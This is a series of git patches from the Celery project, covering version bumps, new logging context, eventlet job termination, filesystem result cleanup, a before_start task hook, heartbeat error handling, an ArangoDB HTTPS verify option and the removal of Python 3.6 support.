If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0b1 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0b2 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index df89bf8936f..6248ddec82c 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0b1'
+__version__ = '5.2.0b2'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 600b48da6a9..5cf7b344ea5 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0b1 (cliffs)
+:Version: 5.2.0b2 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From ad994719bafe6747af6cf8251efb0925284a9260 Mon Sep 17 00:00:00 2001
From: Dave Johansen
Date: Tue, 17 Aug 2021 11:54:04 -0600
Subject: [PATCH 045/177] Add args to LOG_RECEIVED (fixes #6885) (#6898)
* Add args and kwargs to LOG_RECEIVED and LOG_SUCCESS
* Add kwargs and args to test
---
celery/app/trace.py | 2 ++
celery/worker/strategy.py | 8 +++++++-
t/unit/worker/test_strategy.py | 2 +-
3 files changed, 10 insertions(+), 2 deletions(-)
diff --git a/celery/app/trace.py b/celery/app/trace.py
index ad2bd581dbb..8c4f763a592 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -527,6 +527,8 @@ def trace_task(uuid, args, kwargs, request=None):
'name': get_task_name(task_request, name),
'return_value': Rstr,
'runtime': T,
+ 'args': safe_repr(args),
+ 'kwargs': safe_repr(kwargs),
})
# -* POST *-
diff --git a/celery/worker/strategy.py b/celery/worker/strategy.py
index 09bdea7c1be..b6e9a17c6b6 100644
--- a/celery/worker/strategy.py
+++ b/celery/worker/strategy.py
@@ -2,6 +2,7 @@
import logging
from kombu.asynchronous.timer import to_timestamp
+from kombu.utils.encoding import safe_repr
from celery import signals
from celery.app import trace as _app_trace
@@ -151,7 +152,12 @@ def task_message_handler(message, body, ack, reject, callbacks,
if _does_info:
# Similar to `app.trace.info()`, we pass the formatting args as the
# `extra` kwarg for custom log handlers
- context = {'id': req.id, 'name': req.name}
+ context = {
+ 'id': req.id,
+ 'name': req.name,
+ 'args': safe_repr(req.args),
+ 'kwargs': safe_repr(req.kwargs),
+ }
info(_app_trace.LOG_RECEIVED, context, extra={'data': context})
if (req.expires or req.id in revoked_tasks) and req.revoked():
return
diff --git a/t/unit/worker/test_strategy.py b/t/unit/worker/test_strategy.py
index cb8c73d17cb..2e81fa0b7f9 100644
--- a/t/unit/worker/test_strategy.py
+++ b/t/unit/worker/test_strategy.py
@@ -191,7 +191,7 @@ def test_log_task_received_custom(self, caplog):
C()
for record in caplog.records:
if record.msg == custom_fmt:
- assert set(record.args) == {"id", "name"}
+ assert set(record.args) == {"id", "name", "kwargs", "args"}
break
else:
raise ValueError("Expected message not in captured log records")
From 16959cdb895b187265745d19a212ca0844c6dd78 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C4=90or=C4=91e=20Ivkovi=C4=87?=
Date: Wed, 18 Aug 2021 20:16:37 +0200
Subject: [PATCH 046/177] Terminate job implementation for eventlet concurrency
backend (#6917)
* Terminate job eventlet implementation
#asd
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Use {} instead of dict
* Requested fixes
* Update workers guide docs
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/concurrency/eventlet.py | 47 +++++++++++++++++++++++++----
docs/userguide/workers.rst | 2 +-
t/unit/concurrency/test_eventlet.py | 31 +++++++++++++++++++
3 files changed, 73 insertions(+), 7 deletions(-)
diff --git a/celery/concurrency/eventlet.py b/celery/concurrency/eventlet.py
index c6bb3415f69..f9c9da7f994 100644
--- a/celery/concurrency/eventlet.py
+++ b/celery/concurrency/eventlet.py
@@ -2,6 +2,7 @@
import sys
from time import monotonic
+from greenlet import GreenletExit
from kombu.asynchronous import timer as _timer
from celery import signals
@@ -93,6 +94,7 @@ class TaskPool(base.BasePool):
is_green = True
task_join_will_block = False
_pool = None
+ _pool_map = None
_quick_put = None
def __init__(self, *args, **kwargs):
@@ -107,8 +109,9 @@ def __init__(self, *args, **kwargs):
def on_start(self):
self._pool = self.Pool(self.limit)
+ self._pool_map = {}
signals.eventlet_pool_started.send(sender=self)
- self._quick_put = self._pool.spawn_n
+ self._quick_put = self._pool.spawn
self._quick_apply_sig = signals.eventlet_pool_apply.send
def on_stop(self):
@@ -119,12 +122,17 @@ def on_stop(self):
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, **_):
- self._quick_apply_sig(
- sender=self, target=target, args=args, kwargs=kwargs,
+ target = TaskPool._make_killable_target(target)
+ self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,)
+ greenlet = self._quick_put(
+ apply_target,
+ target, args,
+ kwargs,
+ callback,
+ accept_callback,
+ self.getpid
)
- self._quick_put(apply_target, target, args, kwargs,
- callback, accept_callback,
- self.getpid)
+ self._add_to_pool_map(id(greenlet), greenlet)
def grow(self, n=1):
limit = self.limit + n
@@ -136,6 +144,12 @@ def shrink(self, n=1):
self._pool.resize(limit)
self.limit = limit
+ def terminate_job(self, pid, signal=None):
+ if pid in self._pool_map.keys():
+ greenlet = self._pool_map[pid]
+ greenlet.kill()
+ greenlet.wait()
+
def _get_info(self):
info = super()._get_info()
info.update({
@@ -144,3 +158,24 @@ def _get_info(self):
'running-threads': self._pool.running(),
})
return info
+
+ @staticmethod
+ def _make_killable_target(target):
+ def killable_target(*args, **kwargs):
+ try:
+ return target(*args, **kwargs)
+ except GreenletExit:
+ return (False, None, None)
+ return killable_target
+
+ def _add_to_pool_map(self, pid, greenlet):
+ self._pool_map[pid] = greenlet
+ greenlet.link(
+ TaskPool._cleanup_after_job_finish,
+ self._pool_map,
+ pid
+ )
+
+ @staticmethod
+ def _cleanup_after_job_finish(greenlet, pool_map, pid):
+ del pool_map[pid]
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index fa3cf468884..74e29490913 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -324,7 +324,7 @@ Commands
``revoke``: Revoking tasks
--------------------------
-:pool support: all, terminate only supported by prefork
+:pool support: all, terminate only supported by prefork and eventlet
:broker support: *amqp, redis*
:command: :program:`celery -A proj control revoke `
diff --git a/t/unit/concurrency/test_eventlet.py b/t/unit/concurrency/test_eventlet.py
index dcd803e5342..9dcdb479b26 100644
--- a/t/unit/concurrency/test_eventlet.py
+++ b/t/unit/concurrency/test_eventlet.py
@@ -2,6 +2,7 @@
from unittest.mock import Mock, patch
import pytest
+from greenlet import GreenletExit
import t.skip
from celery.concurrency.eventlet import TaskPool, Timer, apply_target
@@ -101,6 +102,7 @@ def test_pool(self):
x.on_apply(Mock())
x._pool = None
x.on_stop()
+ assert len(x._pool_map.keys()) == 1
assert x.getpid()
@patch('celery.concurrency.eventlet.base')
@@ -130,3 +132,32 @@ def test_get_info(self):
'free-threads': x._pool.free(),
'running-threads': x._pool.running(),
}
+
+ def test_terminate_job(self):
+ func = Mock()
+ pool = TaskPool(10)
+ pool.on_start()
+ pool.on_apply(func)
+
+ assert len(pool._pool_map.keys()) == 1
+ pid = list(pool._pool_map.keys())[0]
+ greenlet = pool._pool_map[pid]
+
+ pool.terminate_job(pid)
+ greenlet.link.assert_called_once()
+ greenlet.kill.assert_called_once()
+
+ def test_make_killable_target(self):
+ def valid_target():
+ return "some result..."
+
+ def terminating_target():
+ raise GreenletExit()
+
+ assert TaskPool._make_killable_target(valid_target)() == "some result..."
+ assert TaskPool._make_killable_target(terminating_target)() == (False, None, None)
+
+ def test_cleanup_after_job_finish(self):
+ testMap = {'1': None}
+ TaskPool._cleanup_after_job_finish(None, testMap, '1')
+ assert len(testMap) == 0
From 3ef5b54bd5ff6d5b5e9184f348817a209e9111d6 Mon Sep 17 00:00:00 2001
From: Evgeny Prigorodov
Date: Sat, 21 Aug 2021 11:47:16 +0200
Subject: [PATCH 047/177] Add cleanup implementation to filesystem backend
(#6919)
* Add cleanup implementation to filesystem backend
* improve unit test coverage
in backends.filesystem.FilesystemBackend.cleanup()
* replace os.scandir() with os.listdir()
due to possible problems when testing under pypy-3.7, windows-2019
(https://github.com/pytest-dev/pytest/issues/6419)
---
celery/backends/filesystem.py | 17 ++++++++++++++
t/unit/backends/test_filesystem.py | 36 ++++++++++++++++++++++++++++++
2 files changed, 53 insertions(+)
diff --git a/celery/backends/filesystem.py b/celery/backends/filesystem.py
index 26a48aeaa56..6bc6bb141d0 100644
--- a/celery/backends/filesystem.py
+++ b/celery/backends/filesystem.py
@@ -1,6 +1,7 @@
"""File-system result store backend."""
import locale
import os
+from datetime import datetime
from kombu.utils.encoding import ensure_bytes
@@ -94,3 +95,19 @@ def mget(self, keys):
def delete(self, key):
self.unlink(self._filename(key))
+
+ def cleanup(self):
+ """Delete expired meta-data."""
+ if not self.expires:
+ return
+ epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone)
+ now_ts = (self.app.now() - epoch).total_seconds()
+ cutoff_ts = now_ts - self.expires
+ for filename in os.listdir(self.path):
+ for prefix in (self.task_keyprefix, self.group_keyprefix,
+ self.chord_keyprefix):
+ if filename.startswith(prefix):
+ path = os.path.join(self.path, filename)
+ if os.stat(path).st_mtime < cutoff_ts:
+ self.unlink(path)
+ break
diff --git a/t/unit/backends/test_filesystem.py b/t/unit/backends/test_filesystem.py
index 98a37b2e070..4fb46683f4f 100644
--- a/t/unit/backends/test_filesystem.py
+++ b/t/unit/backends/test_filesystem.py
@@ -1,6 +1,9 @@
import os
import pickle
+import sys
import tempfile
+import time
+from unittest.mock import patch
import pytest
@@ -92,3 +95,36 @@ def test_forget_deletes_file(self):
def test_pickleable(self):
tb = FilesystemBackend(app=self.app, url=self.url, serializer='pickle')
assert pickle.loads(pickle.dumps(tb))
+
+ @pytest.mark.skipif(sys.platform == 'win32', reason='Test can fail on '
+ 'Windows/FAT due to low granularity of st_mtime')
+ def test_cleanup(self):
+ tb = FilesystemBackend(app=self.app, url=self.url)
+ yesterday_task_ids = [uuid() for i in range(10)]
+ today_task_ids = [uuid() for i in range(10)]
+ for tid in yesterday_task_ids:
+ tb.mark_as_done(tid, 42)
+ day_length = 0.2
+ time.sleep(day_length) # let FS mark some difference in mtimes
+ for tid in today_task_ids:
+ tb.mark_as_done(tid, 42)
+ with patch.object(tb, 'expires', 0):
+ tb.cleanup()
+ # test that zero expiration time prevents any cleanup
+ filenames = set(os.listdir(tb.path))
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids + today_task_ids
+ )
+ # test that non-zero expiration time enables cleanup by file mtime
+ with patch.object(tb, 'expires', day_length):
+ tb.cleanup()
+ filenames = set(os.listdir(tb.path))
+ assert not any(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids
+ )
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in today_task_ids
+ )
From ba64109d68b00b32fb7898daf72f72469aaaebb4 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Tue, 24 Aug 2021 11:42:40 +0300
Subject: [PATCH 048/177] [pre-commit.ci] pre-commit autoupdate (#6926)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.23.3 → v2.24.0](https://github.com/asottile/pyupgrade/compare/v2.23.3...v2.24.0)
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 4781a27634d..c05c93b2734 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.23.3
+ rev: v2.24.0
hooks:
- id: pyupgrade
args: ["--py36-plus"]
From 45871eb839f0c0cbb92e6d6b5a78694c42385589 Mon Sep 17 00:00:00 2001
From: Cristi
Date: Wed, 25 Aug 2021 19:26:35 +0200
Subject: [PATCH 049/177] Add before_start hook (fixes #4110) (#6923)
* Add before_start handler
* Add documentation
* Fix docs of arguments; add versionadded directive
* Add versionadded directive in docstring
Co-authored-by: Cristian Betivu
---
celery/app/task.py | 14 ++++++++++++++
celery/app/trace.py | 6 ++++++
docs/userguide/tasks.rst | 12 ++++++++++++
t/unit/tasks/test_trace.py | 8 ++++++++
4 files changed, 40 insertions(+)
diff --git a/celery/app/task.py b/celery/app/task.py
index 06366d73ed1..e58b5b8ade5 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -972,6 +972,20 @@ def update_state(self, task_id=None, state=None, meta=None, **kwargs):
self.backend.store_result(
task_id, meta, state, request=self.request, **kwargs)
+ def before_start(self, task_id, args, kwargs):
+ """Handler called before the task starts.
+
+ .. versionadded:: 5.2
+
+ Arguments:
+ task_id (str): Unique id of the task to execute.
+ args (Tuple): Original arguments for the task to execute.
+ kwargs (Dict): Original keyword arguments for the task to execute.
+
+ Returns:
+ None: The return value of this handler is ignored.
+ """
+
def on_success(self, retval, task_id, args, kwargs):
"""Success handler.
diff --git a/celery/app/trace.py b/celery/app/trace.py
index 8c4f763a592..7b5b00b8c95 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -345,8 +345,11 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
loader_task_init = loader.on_task_init
loader_cleanup = loader.on_process_cleanup
+ task_before_start = None
task_on_success = None
task_after_return = None
+ if task_has_custom(task, 'before_start'):
+ task_before_start = task.before_start
if task_has_custom(task, 'on_success'):
task_on_success = task.on_success
if task_has_custom(task, 'after_return'):
@@ -442,6 +445,9 @@ def trace_task(uuid, args, kwargs, request=None):
# -*- TRACE -*-
try:
+ if task_before_start:
+ task_before_start(uuid, args, kwargs)
+
R = retval = fun(*args, **kwargs)
state = SUCCESS
except Reject as exc:
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index 0fb1f2463aa..eeb31d3ed21 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -1440,6 +1440,18 @@ The default value is the class provided by Celery: ``'celery.app.task:Task'``.
Handlers
--------
+.. method:: before_start(self, task_id, args, kwargs)
+
+ Run by the worker before the task starts executing.
+
+ .. versionadded:: 5.2
+
+ :param task_id: Unique id of the task to execute.
+ :param args: Original arguments for the task to execute.
+ :param kwargs: Original keyword arguments for the task to execute.
+
+ The return value of this handler is ignored.
+
.. method:: after_return(self, status, retval, task_id, args, kwargs, einfo)
Handler called after the task returns.
diff --git a/t/unit/tasks/test_trace.py b/t/unit/tasks/test_trace.py
index f796a12aa95..55c106894bd 100644
--- a/t/unit/tasks/test_trace.py
+++ b/t/unit/tasks/test_trace.py
@@ -61,6 +61,14 @@ def test_trace_successful(self):
assert info is None
assert retval == 4
+ def test_trace_before_start(self):
+ @self.app.task(shared=False, before_start=Mock())
+ def add_with_before_start(x, y):
+ return x + y
+
+ self.trace(add_with_before_start, (2, 2), {})
+ add_with_before_start.before_start.assert_called()
+
def test_trace_on_success(self):
@self.app.task(shared=False, on_success=Mock())
def add_with_success(x, y):
From e726978a39a05838805d2b026c4f1c962cfb23b7 Mon Sep 17 00:00:00 2001
From: Josue Balandrano Coronel
Date: Thu, 26 Aug 2021 02:49:51 -0500
Subject: [PATCH 050/177] Restart consumer if connection drops (#6930)
* Restart consumer if the celery connection drops
original commit by @bremac https://github.com/celery/celery/commit/385a60df09201a17ad646c71eb1c00255d0a4431?diff=unified
Previously if an ack or reject message failed because the connection
was unavailable then celery would stop accepting messages until it was
restarted. This problem is that the main celery loop is responsible for
detecting closed connections, but the connection errors would not always
reach the main loop.
There are three places in the celery that share a long-running AMQP connection:
1. The core worker loop listens for new messages.
2. The ack / reject code that runs after a task completes.
3. The heartbeat loop that keeps the connection alive.
Neither of the first two are guaranteed to see an error if the connection drops.
The main listener may never see an error if the connection drops since it may be
swallowed by drain_events; the connection may drop while no work is being done,
so the ack / reject code will never be triggered.
Fortunately the heartbeat loop is guaranteed to see an error if the connection
dies: periodic writes to the socket will fail with a broken pipe error.
Unfortunately it runs in a separate thread, so previously connection errors were
swallowed silently.
This commit alters the heartbeat code so that heartbeat error are always
re-raised in the main loop. This triggers existing code in the worker that
restarts the worker, reestablishing the connection. With the fix in place I've
been able to trigger ten long-running (three minute) RCA queries without the
worker hanging; without the fix it became unavailable after one or two queries.
* fix: heartbeat_error to object
* revert: heartbeat_error has to be pass by reference.
- preallocating the list avoids it from growing on each check
* fix: add comment
* Add unit tests
* Fix lint
* Update call to args in test
Co-authored-by: Steven Joseph
---
celery/worker/loops.py | 33 +++++++++++++----
t/unit/worker/test_loops.py | 74 +++++++++++++++++++++++++++++++++++--
2 files changed, 97 insertions(+), 10 deletions(-)
diff --git a/celery/worker/loops.py b/celery/worker/loops.py
index b60d95c11de..0630e679fdd 100644
--- a/celery/worker/loops.py
+++ b/celery/worker/loops.py
@@ -26,11 +26,25 @@ def _quick_drain(connection, timeout=0.1):
def _enable_amqheartbeats(timer, connection, rate=2.0):
- if connection:
- tick = connection.heartbeat_check
- heartbeat = connection.get_heartbeat_interval() # negotiated
- if heartbeat and connection.supports_heartbeats:
- timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ heartbeat_error = [None]
+
+ if not connection:
+ return heartbeat_error
+
+ heartbeat = connection.get_heartbeat_interval() # negotiated
+ if not (heartbeat and connection.supports_heartbeats):
+ return heartbeat_error
+
+ def tick(rate):
+ try:
+ connection.heartbeat_check(rate)
+ except Exception as e:
+ # heartbeat_error is passed by reference can be updated
+ # no append here list should be fixed size=1
+ heartbeat_error[0] = e
+
+ timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ return heartbeat_error
def asynloop(obj, connection, consumer, blueprint, hub, qos,
@@ -42,7 +56,7 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
on_task_received = obj.create_task_handler()
- _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
obj.controller.register_with_event_loop(hub)
@@ -70,6 +84,8 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
try:
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
# We only update QoS when there's no more messages to read.
# This groups together qos calls, and makes sure that remote
@@ -95,8 +111,9 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
RUN = bootsteps.RUN
on_task_received = obj.create_task_handler()
perform_pending_operations = obj.perform_pending_operations
+ heartbeat_error = [None]
if getattr(obj.pool, 'is_green', False):
- _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
consumer.consume()
@@ -104,6 +121,8 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
if qos.prev != qos.value:
qos.update()
try:
diff --git a/t/unit/worker/test_loops.py b/t/unit/worker/test_loops.py
index 27d1b832ea0..2b2db226554 100644
--- a/t/unit/worker/test_loops.py
+++ b/t/unit/worker/test_loops.py
@@ -158,9 +158,10 @@ def test_setup_heartbeat(self):
asynloop(*x.args)
x.consumer.consume.assert_called_with()
x.obj.on_ready.assert_called_with()
- x.hub.timer.call_repeatedly.assert_called_with(
- 10 / 2.0, x.connection.heartbeat_check, (2.0,),
- )
+ last_call_args, _ = x.hub.timer.call_repeatedly.call_args
+
+ assert last_call_args[0] == 10 / 2.0
+ assert last_call_args[2] == (2.0,)
def task_context(self, sig, **kwargs):
x, on_task = get_task_callback(self.app, **kwargs)
@@ -429,6 +430,30 @@ def test_poll_raises_ValueError(self):
asynloop(*x.args)
poller.poll.assert_called()
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.connection.heartbeat_check = Mock(
+ side_effect=RuntimeError("Heartbeat error")
+ )
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.hub.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ asynloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.hub.on_tick.add(x.closer(mod=2))
+ asynloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
class test_synloop:
@@ -459,6 +484,49 @@ def test_ignores_socket_errors_when_closed(self):
x.close_then_error(x.connection.drain_events)
assert synloop(*x.args) is None
+ def test_no_connection(self):
+ x = X(self.app)
+ x.connection = None
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.blueprint.state = CLOSE
+ synloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.obj.pool.is_green = True
+
+ def heartbeat_check(rate):
+ raise RuntimeError('Heartbeat error')
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.connection.heartbeat_check = Mock(
+ name='heartbeat_check', side_effect=heartbeat_check
+ )
+ x.obj.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ synloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.obj.pool.is_green = True
+ x.obj.timer.call_repeatedly = Mock(
+ name='x.obj.timer.call_repeatedly()'
+ )
+
+ def drain_events(timeout):
+ x.blueprint.state = CLOSE
+ x.connection.drain_events.side_effect = drain_events
+ synloop(*x.args)
+
+ x.obj.timer.call_repeatedly.assert_not_called()
+
class test_quick_drain:
From ec5b1d7fff597e5e69ba273bec224ba704437e5b Mon Sep 17 00:00:00 2001
From: kronion
Date: Thu, 26 Aug 2021 23:29:32 -0500
Subject: [PATCH 051/177] Remove outdated optimization documentation (#6933)
* Remove outdated optimization documentation
* Update CONTRIBUTORS.txt
---
CONTRIBUTORS.txt | 1 +
docs/getting-started/next-steps.rst | 7 -------
2 files changed, 1 insertion(+), 7 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index fa80335e9c9..5dee5a11685 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -284,3 +284,4 @@ Ruaridh Williamson, 2021/03/09
Garry Lawrence, 2021/06/19
Patrick Zhang, 2017/08/19
Konstantin Kochin, 2021/07/11
+kronion, 2021/08/26
diff --git a/docs/getting-started/next-steps.rst b/docs/getting-started/next-steps.rst
index 2b66fd5ce04..d919d0e57c5 100644
--- a/docs/getting-started/next-steps.rst
+++ b/docs/getting-started/next-steps.rst
@@ -766,13 +766,6 @@ If you have strict fair scheduling requirements, or want to optimize
for throughput then you should read the :ref:`Optimizing Guide
`.
-If you're using RabbitMQ then you can install the :pypi:`librabbitmq`
-module, an AMQP client implemented in C:
-
-.. code-block:: console
-
- $ pip install librabbitmq
-
What to do now?
===============
From 8b705b1ddbef81d431e41d3722e4176802dd4987 Mon Sep 17 00:00:00 2001
From: Dilip Vamsi Moturi <16288600+dilipvamsi@users.noreply.github.com>
Date: Mon, 30 Aug 2021 13:34:58 +0530
Subject: [PATCH 052/177] added https verification check functionality in
arangodb backend (#6800)
* added https verification functionality
* added verify tests
---
celery/backends/arangodb.py | 4 +++-
docs/userguide/configuration.rst | 10 ++++++++++
t/unit/backends/test_arangodb.py | 5 ++++-
3 files changed, 17 insertions(+), 2 deletions(-)
diff --git a/celery/backends/arangodb.py b/celery/backends/arangodb.py
index 1cd82078070..a7575741575 100644
--- a/celery/backends/arangodb.py
+++ b/celery/backends/arangodb.py
@@ -48,6 +48,7 @@ class ArangoDbBackend(KeyValueStoreBackend):
password = None
# protocol is not supported in backend url (http is taken as default)
http_protocol = 'http'
+ verify = False
# Use str as arangodb key not bytes
key_t = str
@@ -88,6 +89,7 @@ def __init__(self, url=None, *args, **kwargs):
self.host = host or config.get('host', self.host)
self.port = int(port or config.get('port', self.port))
self.http_protocol = config.get('http_protocol', self.http_protocol)
+ self.verify = config.get('verify', self.verify)
self.database = database or config.get('database', self.database)
self.collection = \
collection or config.get('collection', self.collection)
@@ -104,7 +106,7 @@ def connection(self):
if self._connection is None:
self._connection = py_arango_connection.Connection(
arangoURL=self.arangodb_url, username=self.username,
- password=self.password
+ password=self.password, verify=self.verify
)
return self._connection
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 68207482b8e..f78388fd7b7 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -1884,6 +1884,16 @@ This is a dict supporting the following keys:
Password to authenticate to the ArangoDB server (optional).
+* ``http_protocol``
+
+ HTTP Protocol in ArangoDB server connection.
+ Defaults to ``http``.
+
+* ``verify``
+
+ HTTPS Verification check while creating the ArangoDB connection.
+ Defaults to ``False``.
+
.. _conf-cosmosdbsql-result-backend:
CosmosDB backend settings (experimental)
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 2cb2f33c9db..992c21a8ef4 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -71,7 +71,8 @@ def test_config_params(self):
'password': 'mysecret',
'database': 'celery_database',
'collection': 'celery_collection',
- 'http_protocol': 'https'
+ 'http_protocol': 'https',
+ 'verify': True
}
x = ArangoDbBackend(app=self.app)
assert x.host == 'test.arangodb.com'
@@ -82,6 +83,7 @@ def test_config_params(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'https'
assert x.arangodb_url == 'https://test.arangodb.com:8529'
+ assert x.verify == True
def test_backend_by_url(
self, url="arangodb://username:password@host:port/database/collection"
@@ -106,6 +108,7 @@ def test_backend_params_by_url(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'http'
assert x.arangodb_url == 'http://test.arangodb.com:8529'
+ assert x.verify == False
def test_backend_cleanup(self):
now = datetime.datetime.utcnow()
From 25570839c539578b83b9e9d2ff9d90b27c9b9d38 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 29 Aug 2021 11:49:26 +0300
Subject: [PATCH 053/177] Drop Python 3.6 support.
Python 3.6 is EOL in a few days and 5.2 will not support it.
Therefore, we will not need to test Celery with Python 3.6 anymore.
---
.github/workflows/python-package.yml | 2 +-
tox.ini | 10 ++++------
2 files changed, 5 insertions(+), 7 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 41b525ca2cb..0c1855b7ebb 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,7 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.6', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
exclude:
- os: windows-2019
diff --git a/tox.ini b/tox.ini
index bf181af2731..64213027b9c 100644
--- a/tox.ini
+++ b/tox.ini
@@ -2,8 +2,8 @@
requires =
tox-gh-actions
envlist =
- {3.6,3.7,3.8,3.9,3.10,pypy3}-unit
- {3.6,3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
+ {3.7,3.8,3.9,3.10,pypy3}-unit
+ {3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
flake8
apicheck
@@ -13,7 +13,6 @@ envlist =
[gh-actions]
python =
- 3.6: 3.6-unit
3.7: 3.7-unit
3.8: 3.8-unit
3.9: 3.9-unit
@@ -31,8 +30,8 @@ deps=
-r{toxinidir}/requirements/test.txt
-r{toxinidir}/requirements/pkgutils.txt
- 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
- 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
pypy3: -r{toxinidir}/requirements/test-ci-default.txt
integration: -r{toxinidir}/requirements/test-integration.txt
@@ -74,7 +73,6 @@ setenv =
azureblockblob: TEST_BACKEND=azureblockblob://DefaultEndpointsProtocol=http;AccountName=devstoreaccount1;AccountKey=Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==;BlobEndpoint=http://127.0.0.1:10000/devstoreaccount1;
basepython =
- 3.6: python3.6
3.7: python3.7
3.8: python3.8
3.9: python3.9
From a0635955391992180171f75d80be72c5752635e5 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 30 Aug 2021 17:28:25 +0600
